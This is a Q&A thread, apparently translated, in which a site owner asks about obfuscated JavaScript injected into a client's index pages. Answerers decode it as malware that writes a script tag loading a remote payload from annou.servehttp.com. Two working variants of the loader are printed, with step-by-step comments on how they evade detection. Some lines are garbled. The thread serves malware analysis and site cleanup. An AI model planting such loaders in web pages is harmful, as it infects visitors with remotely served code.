Unclear JavaScript code in index.php / index.html files

Maybe someone here can help or explain what happened. I just noticed today that on one of my client's sites all index.php / index.html files were modified and some obscure JavaScript code was added. The code is below:

<script type="text/javascript">
// Obfuscated loader as found injected into the site's index.php / index.html (quoted from the
// question). Annotated for analysis only: the comments describe what each visible line does.
// Indicators worth grepping the whole site for: a `.replace(/<token>/g,"%")` call, an alias of
// `unescape`, and `document.write` reached through a string-built property name.
var nhZE2uSD="Ow8xN18Ow8xN31"; // junk assignment, never read (and re-declared below)
// The payload is split into 21 fragments. "Ow8xN" stands in for "%", so every fragment is a run
// of percent-encoded bytes ("Ow8xN3c" -> "%3c" -> "<"). Splitting the string defeats naive
// signature matching on the literal markup.
var usW1446O0="Ow8xN3cOw8xN73Ow8xN63Ow8xN72"; 
var usW1446O1="Ow8xN69Ow8xN70Ow8xN74Ow8xN20"; 
var usW1446O2="Ow8xN74Ow8xN79Ow8xN70Ow8xN65"; 
var usW1446O3="Ow8xN3dOw8xN22Ow8xN74Ow8xN65"; 
var usW1446O4="Ow8xN78Ow8xN74Ow8xN2fOw8xN6a"; 
var usW1446O5="Ow8xN61Ow8xN76Ow8xN61Ow8xN73"; 
var usW1446O6="Ow8xN63Ow8xN72Ow8xN69Ow8xN70"; 
var usW1446O7="Ow8xN74Ow8xN22Ow8xN20Ow8xN73"; 
var usW1446O8="Ow8xN72Ow8xN63Ow8xN3dOw8xN22"; 
var usW1446O9="Ow8xN68Ow8xN74Ow8xN74Ow8xN70"; 
var usW1446O10="Ow8xN3aOw8xN2fOw8xN2fOw8xN61"; 
var usW1446O11="Ow8xN6eOw8xN6eOw8xN6fOw8xN75"; 
var usW1446O12="Ow8xN2eOw8xN73Ow8xN65Ow8xN72"; 
var usW1446O13="Ow8xN76Ow8xN65Ow8xN68Ow8xN74"; 
var usW1446O14="Ow8xN74Ow8xN70Ow8xN2eOw8xN63"; 
var usW1446O15="Ow8xN6fOw8xN6dOw8xN2fOw8xN2f"; 
var usW1446O16="Ow8xN6dOw8xN6cOw8xN2eOw8xN70"; 
var usW1446O17="Ow8xN68Ow8xN70Ow8xN22Ow8xN3e"; 
var usW1446O18="Ow8xN20Ow8xN3cOw8xN2fOw8xN73"; 
var usW1446O19="Ow8xN63Ow8xN72Ow8xN69Ow8xN70"; 
var usW1446O20="Ow8xN74Ow8xN3e"; 
var JgUg10US="g4Uuq18Ow8xN31"; // junk assignment, never read
// Reassemble the fragments in order.
// NOTE(review): "usW  1446O8" (with two spaces) looks like a line-wrap artifact of the paste; as
// written it is a syntax error, the original is presumably `usW1446O8`.
var Q8NVsUq5=usW1446O0+usW1446O1+usW1446O2+usW1446O3+usW1446O4+usW1446O5+usW1446O6+usW1446O7+usW  1446O8+usW1446O9+usW1446O10+usW1446O11+usW1446O12+usW1446O13+usW1446O14+usW1446O15+usW1446O16+usW1446O17+usW1446O18+usW1446O19+usW1446O20; 
// Restore the "%" delimiters: the result is an ordinary percent-encoded string.
CvhvkAeR=Q8NVsUq5.replace(/Ow8xN/g,"%");
// Alias the percent-decoder under an innocuous name so "unescape(" never appears at the call site.
var KcQGBJKD=unescape;
var nhZE2uSD="cZLH618g4Uuq31"; // junk re-declaration, never read
// At the top level of a non-strict script `this` is the global object (window in a browser).
q9124=this; 
// Deleting every Y, 1, 2, W, l, G and ":" from the literal leaves "document", so this is
// window["document"] without the word "document" appearing in the source.
var WrEGuKeo=q9124["WYd1GoGYc2uG1mYGe2YnltY".replace(/[Y12WlG\:]/g, "")];
// document.write(unescape(payload)). Decoding the hex pairs above gives
// <script type="text/javascript" src="http://annou.servehttp.com//ml.php"> </script>
// (as the accepted answer states), i.e. the real second stage is fetched from a remote host and
// is not contained in this snippet.
WrEGuKeo.write(KcQGBJKD(CvhvkAeR));
</script>

Can someone explain to me what the code is doing?

Thanks for any help.


This is malware. It injects:

<script type="text/javascript" src="http://annou.servehttp.com//ml.php"> </script>

Needless to say, I do not recommend visiting this domain.

The script builds a string from the fragments, then WrEGuKeo (which is `document`) calls `.write()` with KcQGBJKD(CvhvkAeR) (the decoded string). KcQGBJKD is simply `unescape`.


, php, HTML- OWASP, - .

Also review any use of eval and the allow_url_fopen setting in php.ini.

See also:

PHPSecInfo


Here is the same script with comments added:

/* The 21 payload fragments (abbreviated here); they are only data, the interesting
 * steps are the concatenation and decoding below
var nhZE2uSD="Ow8xN18Ow8xN31";
var usW1446O0="Ow8xN3cOw8xN73Ow8xN63Ow8xN72"; 
...
var usW1446O20="Ow8xN74Ow8xN3e"; 
var JgUg10US="g4Uuq18Ow8xN31";
*/
var Q8NVsUq5=usW1446O0+usW1446O1+us... // this just concatenates the fragments into one string

/* this turns the "gibberish" into an ordinary percent-encoded (URL-encoded) string
 * by restoring the "%" delimiters; e.g. unescape('Hello%20World') === 'Hello World'
 */
CvhvkAeR=Q8NVsUq5.replace(/Ow8xN/g,"%"); // replace every 'Ow8xN' with '%'

/* give unescape() an alias so the word "unescape" never appears at the call site */
var KcQGBJKD=unescape;

var nhZE2uSD="cZLH618g4Uuq31"; // dead assignment, never read: obfuscation padding

/* at the top level of a (non-strict) script `this` is the global object, i.e. window */
q9124=this;

/* WrEGuKeo = window[$something]
 * to get the value of $something, remove all occurrences of Y,1,2,W,l,G,:
 * from the gibberish to get: 'document'
 * so this line actually reads:
 * var WrEGuKeo = window["document"];
 */
var WrEGuKeo=q9124["WYd1GoGYc2uG1mYGe2YnltY".replace(/[Y12WlG\:]/g, "")];

/*
 * document.write(unescape($ourUrlEncodedStringAbove));
 * i.e. the decoded markup is written straight into the page. The answer above identifies it
 * as a <script src="http://annou.servehttp.com//ml.php"> tag, so the actual payload is
 * fetched from that remote host and is not part of this snippet.
 */
WrEGuKeo.write(KcQGBJKD(CvhvkAeR));

, URL-, .

: URL-, , . , .


, , , , - .

Check FTP access, any upload script, and applications such as phpBB or WordPress for the entry point.


. , , ( ?)


This may be malicious code. Make sure there was no unauthorized access to your FTP account etc.; it is probably best to change all your usernames / passwords, run an anti-virus scan on your computer, and restore the site from an old backup.

Files do not change on their own; someone did this. Here is the embedded code, reformatted:

// A second sample of the same loader, wrapped in the well-known "p,a,c,k,e,d" packer:
// p = packed source, a = token base (62), c = token count (89), k = dictionary, e/d = scratch.
// The packer rewrites every word token in p with its dictionary entry and eval()s the result.
// Annotated for analysis; the packer is reproduced as pasted, including extraction damage.
eval(function (p, a, c, k, e, d) {
// Maps a token index back to its base-62 word (0-9, a-z, then A-Z via fromCharCode(c + 29)).
// NOTE(review): `c35` has lost an operator in extraction; the stock packer reads
// `(c = c % a) > 35 ? ...` and prefixes `(c < a ? '' : e(parseInt(c / a)))`, which the
// two-character tokens in the payload ("1q", "1a", ...) require. As pasted this line will not run.
e = function (c) {
    return (c35 ? String.fromCharCode(c + 29) : c.toString(36))
};
// Fast path: build lookup table d (token -> word), then match any word (\w+) instead of
// each token individually.
if (!''.replace(/^/, String)) {
    while (c--) {
        d[e(c)] = k[c] || e(c)
    }
    k = [function (e) {
        return d[e]
    }];
    e = function () {
        return '\\w+'
    };
    c = 1
};
// Substitute every whole-word token in p with its dictionary entry.
while (c--) {
    if (k[c]) {
        p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c])
    }
}
return p
// The dictionary shows the unpacked code has the same structure as the first snippet: `var`
// fragments concatenated, `.replace(/OUp4s/g,"%")` (delimiter "OUp4s" instead of "Ow8xN"),
// `unescape`, `this["WYd1GoGYc2uG1mYGe2YnltY".replace(/[Y12WlG\:]/g,"")]` (= document) and
// `.write`. The hex fragments differ from the first sample, so the decoded markup differs too;
// what it decodes to is not shown on this page.
}('0 A="X";0 j="W";0 i="V";0 h="U";0 e="Y";0 f="T";0 k="13";0 r="12";0 p="11";0 o="10";0 n="14";0 d="P";0 q="J";0 c="K";0 4="I";0 3="L";0 2="S";0 1="M";0 5="R";0 6="Q";0 b="N";0 a="O";0 9="Z";0 7="1q";0 8="1k";0 m="1j";0 x="1i";0 H="1h";0 F="1l";0 D="1m";0 C="1p";0 E="15";0 G="1o";0 B="1n";0 z="1g";0 u="1f";0 19="18";0 t=j+i+h+e+f+k+r+p+o+n+d+q+c+4+3+2+1+5+6+b+a+9+7+8+m+x+H+F+D+C+E+G+B+z+u;l=t.v(/1c/g,"%");0 y=1d;0 A="1e";s=1b;0 w=s["1a".v(/[16\\:]/g,"")];w.17(y(l));', 62, 89, 'var|Qn4KGrEEJXY216|Qn4KGrEEJXY215|Qn4KGrEEJXY214|Qn4KGrEEJXY213|Qn4KGrEEJXY217|Qn4KGrEEJXY218|Qn4KGrEEJXY222|Qn4KGrEEJXY223|Qn4KGrEEJXY221|Qn4KGrEEJXY220|Qn4KGrEEJXY219|Qn4KGrEEJXY212|Qn4KGrEEJXY210|Qn4KGrEEJXY23|Qn4KGrEEJXY24||Qn4KGrEEJXY22|Qn4KGrEEJXY21|Qn4KGrEEJXY20|Qn4KGrEEJXY25|Sdo7QoQybTJs|Qn4KGrEEJXY224|Qn4KGrEEJXY29|Qn4KGrEEJXY28|Qn4KGrEEJXY27|Qn4KGrEEJXY211|Qn4KGrEEJXY26|q9124|ThAyIvzqbEQQ|Qn4KGrEEJXY234|replace|WNWOcwoyad61|Qn4KGrEEJXY225|pX8f6fgPNrOg|Qn4KGrEEJXY233|HYipCnqdJpgI|Qn4KGrEEJXY232|Qn4KGrEEJXY229|Qn4KGrEEJXY228|Qn4KGrEEJXY230|Qn4KGrEEJXY227|Qn4KGrEEJXY231|Qn4KGrEEJXY226|dOUp4s2fOUp4s74OUp4s72|s74OUp4s74OUp4s70OUp4s|2eOUp4s63OUp4s6fOUp4s6|OUp4s66OUp4s2fOUp4s67O|p4s68OUp4s70OUp4s3fOUp|20OUp4s77OUp4s69OUp4s6|4OUp4s74OUp4s68OUp4s3d|4s76OUp4s65OUp4s68OUp4|s3dOUp4s31OUp4s22OUp4s|4s73OUp4s69OUp4s64OUp4|Up4s6fOUp4s2eOUp4s70OU|s22OUp4s68OUp4s74OUp4s|p4s65OUp4s20OUp4s73OUp|Up4s72OUp4s61OUp4s6dOU|OUp4s3cOUp4s69OUp4s66O|OUp4s17OUp4s34|4s72OUp4s63OUp4s3dOUp4|OUp4s22OUp4s31OUp4s30O|Up4s65OUp4s6dOUp4s2eOU|OUp4s79OUp4s73OUp4s74O|fOUp4s2fOUp4s65OUp4s73|74OUp4s70OUp4s3aOUp4s2|p4s73OUp4s65OUp4s72OUp|p4s3dOUp4s22OUp4s30OUp|Y12WlG|write|VzJjJ17OUp4s34|BbdzeevMKHSt|WYd1GoGYc2uG1mYGe2YnltY|this|OUp4s|unescape|CuPm017VzJjJ34|5OUp4s3e|72OUp4s61OUp4s6dOUp4s6|22OUp4s20OUp4s66OUp4s7|s22OUp4s31OUp4s30OUp4s|4s68OUp4s74OUp4s3dOUp4|p4s65OUp4s69OUp4s67OUp|2OUp4s61OUp4s6dOUp4s65|OUp4s62OUp4s6fOUp4s72O|s2fOUp4s69OUp4s66OUp4s|4s22OUp4s3eOUp4s3cOUp4|Up4s64OUp4s65OUp4s72OU|Up4s22OUp4s20OUp4s68OU'.split('|'),
 // e = 0 (recomputed inside), d = {} (the token -> word table)
 0, {}))

Here is the decoded JavaScript it writes into the page:

<script type="text/javascript" src="http://annou.servehttp.com//ml.php"> </script>

Source: https://habr.com/ru/post/1753678/

